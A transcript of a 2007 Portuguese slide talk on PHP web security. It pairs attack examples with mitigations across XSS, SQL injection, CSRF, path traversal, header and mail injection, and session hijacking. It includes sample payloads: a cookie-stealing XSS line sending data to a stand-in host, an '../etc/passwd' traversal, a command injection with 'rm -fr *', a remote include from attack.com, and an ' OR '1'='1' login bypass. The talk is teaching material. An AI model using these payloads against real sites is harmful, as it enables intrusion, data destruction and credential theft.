A apresentação está carregando. Por favor, espere

A apresentação está carregando. Por favor, espere

Segurança em aplicações Web Exemplos e Casos Práticos em Nuno Lopes, NEIIST – 7º Ciclo de Apresentações. 28/Março/2007.

PublicouFilipe Abela Alterado mais de 10 anos atrás

Apresentações semelhantes

Apresentação em tema: "Segurança em aplicações Web Exemplos e Casos Práticos em Nuno Lopes, NEIIST – 7º Ciclo de Apresentações. 28/Março/2007."— Transcrição da apresentação:

1 Segurança em aplicações Web Exemplos e Casos Práticos em Nuno Lopes, NEIIST – 7º Ciclo de Apresentações. 28/Março/2007

2 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Response Splitting / Header Injection Mail Injection Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

3 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Response Splitting / Header Injection Mail Injection Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

4 Register Globals Configuração do PHP insegura Não usar / desactivar !! script.php?autenticado=1 <?php $autenticado = false; if ($_POST[user] === 'user' (...) ?> register_globals=Off

5 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Response Splitting / Header Injection Mail Injection Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

6 Paths Includes perigosos levam a execução remota de código Visualização de ficheiros confidenciais script.php?file=http://attack.com/script script.php?file=../../../../etc/passwd basename() / dirname() realpath() pathinfo() allow_url_fopen/include=Off

7 Paths Execução de comandos no servidor script.php?opts=-la | rm –fr * escapeshellarg() escapeshellcmd() safe_mode=On (be careful..) script.php?p=script.php%00.html

8 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Response Splitting / Header Injection Mail Injection Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

9 Cross-Site Scripting (XSS) Inserção de HTML/JavaScript numa página (através de variáveis não filtradas) Permite roubo de sessões, passwords, etc.. document.location = 'http://example.org/steal_cookies.php?cookie=' + document.cookie strip_tags() htmlentities() / htmlspecialchars()

10 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Response Splitting / Header Injection Mail Injection Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

11 Response Splitting / Header Injection Inserção de headers HTTP no cliente Perigos similares ao XSS script.php?p=\r\nSet-Cookie: key=val

12 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Response Splitting / Header Injection Mail Injection Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

13 Mail Injection Maioritariamente usado para envio de SPAM script.php?from=x\r\nBcc:tons@of.mails

14 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Response Splitting / Header Injection Mail Injection Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

15 Cross-Site Request Forgeries (CSRF) Método pouco usado em exploits (por enquanto…) Mas muito poderoso e difícil de defender Bastante transversal "sea surf" [img]http://your.forums/newreply.php?action=newthread&subject=aaa& body=some+naughty+words&submit=go[/img]

16 Cross-Site Request Forgeries (CSRF) Não há receitas, depende do programa Usar POST em vez de GET Forçar o uso de forms próprios via TOKEN aleatório "sea surf"

17 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Response Splitting / Header Injection Mail Injection Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

18 SQL Injection Fácil de evitar: Filtrar dados por tipo Usar aspas Prepared statements Não mostrar erros (i.e. mysql_error())

19 SQL Injection script.php?user=admin' OR '1'='1&pass= SELECT * FROM tabela WHERE user='admin' OR '1'='1' AND pass=' '

20 SQL Injection Usar cast explícito para inteiros mysql_real_escape_estring() Usar hashes nos códigos (md5()/sha1()) Cuidado com wildcards (...LIKE %aeiou%) Atenção às queries múltiplas 50) display_user_error(); ?>

21 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Response Splitting / Header Injection Mail Injection Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

22 Session Hijacking Roubo de sessões Sem SSL, fazer lock ao User Agent Usar SSL e fazer lock ao IP (e ao certificado do cliente) Usar apenas cookies (evita URLs do tipo script.php?PHPSESSID=jfh92lpgmc7s6fj e ataques pelo HTTP REFERER)

23 Session Fixation Advém de Engenharia Social Usar session_regenerate_id() depois do login Sessão do atacante deve ficar sem privilégios

24 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Response Splitting / Header Injection Mail Injection Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

25 Links php.net/manual/security www.owasp.org www.securityfocus.com www.phpsecure.info www.net-force.nl ilia.ws/files/quebec_security2007.pdf mega.ist.utl.pt/~ncpl/pres/

26 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Response Splitting / Header Injection Mail Injection Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

Carregar ppt "Segurança em aplicações Web Exemplos e Casos Práticos em Nuno Lopes, NEIIST – 7º Ciclo de Apresentações. 28/Março/2007."

Apresentações semelhantes

What the bad guys will try and what ASP.NET 2.0 does to protect you! Rui Quintino DevScope

What the bad guys will try and what ASP.NET 2.0 does to protect you! Rui Quintino DevScope
Novas Tecnologias Microsoft.

Novas Tecnologias Microsoft.
Pontifícia Universidade Católica de Campinas

Pontifícia Universidade Católica de Campinas
OWASP AppSec Brazil 2010, Campinas, SP

OWASP AppSec Brazil 2010, Campinas, SP
Segurança em PHP Exemplos e Casos Práticos Nuno Lopes, NEIIST – 3º Ciclo de Apresentações. 17/Março/2005.

Segurança em PHP Exemplos e Casos Práticos Nuno Lopes, NEIIST – 3º Ciclo de Apresentações. 17/Março/2005.
Engenharia de Software Alessandro Cruz Marcelo Brandão Theodoro Júnior

Engenharia de Software Alessandro Cruz Marcelo Brandão Theodoro Júnior
Trac é uma ferramenta open source e de interface web para controle de projetos de desenvolvimento de software. O objetivo do software é ajudar o desenvolvedor.

Trac é uma ferramenta open source e de interface web para controle de projetos de desenvolvimento de software. O objetivo do software é ajudar o desenvolvedor.
Luiz Miguel Picelli Sanches – Script em php - Formulário Scripts no formato PHP.

Luiz Miguel Picelli Sanches – Script em php - Formulário Scripts no formato PHP.
Sensores de Presença R. Johnson

Sensores de Presença R. Johnson
ITA - Instituto Tecnológico de Aeronáutica Aula #1.1 – Tutorial de Web Services utilizando o NetBeans 5.5 Disciplina: CE 262 – Ontologias e Web Semântica.

ITA - Instituto Tecnológico de Aeronáutica Aula #1.1 – Tutorial de Web Services utilizando o NetBeans 5.5 Disciplina: CE 262 – Ontologias e Web Semântica.
III – Uso da Infraestrutura Tecnológica Tecnologias de Informação e Comunicação em Desenvolvimento de Produtos III – Uso da Infraestrutura Tecnológica.

III – Uso da Infraestrutura Tecnológica Tecnologias de Informação e Comunicação em Desenvolvimento de Produtos III – Uso da Infraestrutura Tecnológica.
Linguagens Formais e Tradutores Linguagens Regulares (Revisão)

Linguagens Formais e Tradutores Linguagens Regulares (Revisão)
Cookies e Sessões Mauro César Lopes. Mecanismos para guardar estados entre requisições HTTP HTTP é um protocolo sem estado Uma requisição é independente.

Cookies e Sessões Mauro César Lopes. Mecanismos para guardar estados entre requisições HTTP HTTP é um protocolo sem estado Uma requisição é independente.
Outros – Fring Acesse o browser do seu celular o link www.fring.com e clique em Download.

Outros – Fring Acesse o browser do seu celular o link e clique em Download.
Segurança em Web 2.0 Paola Garcia Juarez

Segurança em Web 2.0 Paola Garcia Juarez
Ferramenta para teste de software

Ferramenta para teste de software
Formação IPv6 - RCTS Componente Prática – Parte II.

Formação IPv6 - RCTS Componente Prática – Parte II.
Desenvolvimento de Soluções WEB Escopos de uma Aplicação Web

Desenvolvimento de Soluções WEB Escopos de uma Aplicação Web
Wagner Elias > Extreme Web Hacking São Paulo, 09/11/2008

Wagner Elias > Extreme Web Hacking São Paulo, 09/11/2008
Marcos Aurélio Rodrigues

Marcos Aurélio Rodrigues

Apresentações semelhantes

Anúncios Google